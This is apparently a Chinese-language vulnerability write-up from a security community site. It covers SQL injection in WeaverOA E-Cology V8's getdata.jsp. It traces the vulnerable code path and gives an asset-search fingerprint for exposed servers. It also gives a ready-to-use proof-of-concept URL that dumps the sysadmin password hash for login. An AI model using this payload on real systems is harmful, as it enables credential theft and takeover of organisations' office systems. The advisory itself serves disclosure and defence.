奇安信攻防社区-WeaverOA E-Cology getdata.jsp SQL注入漏洞

# WeaverOA E-Cology getdata.jsp SQL注入漏洞 ## 漏洞描述 WeaverOA V8 存在SQL注入漏洞，攻击者可以通过漏洞获取管理员权限和服务器权限 ## 漏洞影响 WeaverOA V8 ## 网络测绘...

WeaverOA E-Cology getdata.jsp SQL注入漏洞
=====================================

漏洞描述
----

WeaverOA V8 存在SQL注入漏洞，攻击者可以通过漏洞获取管理员权限和服务器权限

漏洞影响
----

WeaverOA V8

网络测绘
----

app="泛微-协同办公OA"

漏洞复现
----

在getdata.jsp中，直接将request对象交给

`weaver.hrm.common.AjaxManager.getData(HttpServletRequest, ServletContext) :`

方法处理

![img](https://shs3.b.qianxin.com/butian_public/f2585758564dcf05269d66283098840bdb933ef79f9af.jpg)

在getData方法中，判断请求里cmd参数是否为空，如果不为空，调用proc方法

![img](https://shs3.b.qianxin.com/butian_public/f636273e7ddacf8918ef16d90c52b409e37caa0f4b5f2.jpg)

Proc方法4个参数，(“空字符串”,”cmd参数值”,request对象，serverContext对象)

在proc方法中，对cmd参数值进行判断，当cmd值等于getSelectAllId时，再从请求中获取sql和type两个参数值，并将参数传递进getSelectAllIds（sql,type）方法中

![img](https://shs3.b.qianxin.com/butian_public/f415826501664d3ddd9989536d4039a79fed29ba8873c.jpg)

POC

```plain
http://xxx.xxx.xxx.xxx/js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select%20password%20as%20id%20from%20HrmResourceManager
```

查询HrmResourceManager表中的password字段，页面中返回了数据库第一条记录的值（sysadmin用户的password）

![img](https://shs3.b.qianxin.com/butian_public/f3980530c3161a29c59cba1b03964b23dc701d279fc39.jpg)

解密后即可登录系统

![img](https://shs3.b.qianxin.com/butian_public/f2900004157cc20192590930f7213a4d84b84f08013d6.jpg)

0 条评论